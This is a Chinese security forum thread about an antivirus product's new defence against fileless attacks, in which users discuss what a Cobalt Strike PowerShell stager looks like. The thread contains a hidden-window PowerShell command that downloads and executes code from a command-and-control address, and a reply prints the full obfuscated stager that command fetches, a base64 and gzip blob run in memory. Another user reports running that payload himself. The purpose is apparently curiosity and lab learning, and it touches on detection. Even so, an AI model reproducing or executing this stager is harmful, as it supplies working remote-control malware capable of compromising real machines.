毒霸V15本周版本新增内存防护引擎，可防御无文件攻击

kuroandsan

四舍五入等于ATD（大雾

pal家族

dsb2466 发表于 2022-8-16 16:58
我真的不是DB官人，我现在是粉丝

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.130:80/a'))"
这个为啥是cobalt
求专业人士解答

dsb2466

pal家族 发表于 2022-8-16 17:05
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.4 ...

0、倒不是说这个地址一定就是Cobalt Strike，重点其实是那个地址里面的内容，决定了这是啥东西。


1、截图这个地址，其实是Cobalt Strike生成器默认自动生成Payload的地址，我选的powershell就会生成第二张图的PS命令行，192.168.40.130是我自己控制端的CC地址：



2、生成的powershell命令行就是前面截图中的结构：


3、地址中的内容如下：

1. $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

复制代码

4、2个虚拟机就可以自己完整模拟CS的控制与被控制了，嘿嘿

pal家族

dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike，重点其实是那个地址里面的内容，决定了这是啥东西。

我可以自己试试嘛？
要不你把payload地址换一个都能访问的地址，我们来玩一玩

pal家族

dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike，重点其实是那个地址里面的内容，决定了这是啥东西。

我直接用你给的payload试了下



另外毒霸的杀毒能力实在堪忧
https://opentip.kaspersky.com/09 ... 52442F512135A9BFFF/

dsb2466

pal家族 发表于 2022-8-16 17:57
我直接用你给的payload试了下

哈哈，你会了

pal家族

dsb2466 发表于 2022-8-16 17:59
哈哈，你会了

加强下杀毒能力
这脚本毒霸竟然不能杀 。。。卡巴直接启发了
https://opentip.kaspersky.com/09 ... 52442F512135A9BFFF/ ‘’‘

dsb2466

pal家族 发表于 2022-8-16 18:00
加强下杀毒能力
这脚本毒霸竟然不能杀 。。。卡巴直接启发了
https://opentip.kaspersky.com/09 ... 52 ...

啊这。。。得找DB官人了

00006666

dsb2466 发表于 2022-8-16 17:28
0、倒不是说这个地址一定就是Cobalt Strike，重点其实是那个地址里面的内容，决定了这是啥东西。

cs这个东西不是一般都是生成shellcode，然后再放别的加载器里面的，应该很少是直接生成PS1或者exe啥的吧……

00006666

编辑